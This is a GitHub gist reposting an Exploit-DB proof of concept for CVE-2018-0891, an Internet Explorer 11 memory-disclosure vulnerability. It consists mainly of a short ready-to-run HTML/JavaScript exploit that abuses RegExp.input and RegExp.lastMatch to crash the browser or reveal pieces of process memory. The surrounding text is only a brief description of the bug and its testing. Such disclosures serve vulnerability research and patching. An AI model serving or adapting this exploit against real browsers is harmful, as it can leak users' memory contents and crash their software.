Skip to content

Instantly share code, notes, and snippets.

@blackout314
Created March 20, 2018 15:31
Show Gist options
  • Save blackout314/36f5675cf4f5568c715b0a142fd0b3fc to your computer and use it in GitHub Desktop.
Save blackout314/36f5675cf4f5568c715b0a142fd0b3fc to your computer and use it in GitHub Desktop.
CVE-2018-0891
/*
There is a vulnerability in Internet Explorer that could potentially be used for memory disclosure.
This was tested on IE11 running on Window 7 64-bit with the latest patches applied.
PoC:
=========================================
*/
<!-- saved from url=(0014)about:internet -->
<script>
function main() {
RegExp.input = {toString: f};
alert(RegExp.lastMatch);
}
var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");
function f() {
String.prototype.match.call(input, "bbbbbbbbbb");
}
main();
</script>
/*
=========================================
https://www.exploit-db.com/exploits/44312/?rss&utm_source=dlvr.it&utm_medium=twitter
Note that sometimes the PoC results in a crash (I made no attempt to make it reliable) while sometimes it results in pieces of memory being displayed
*/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment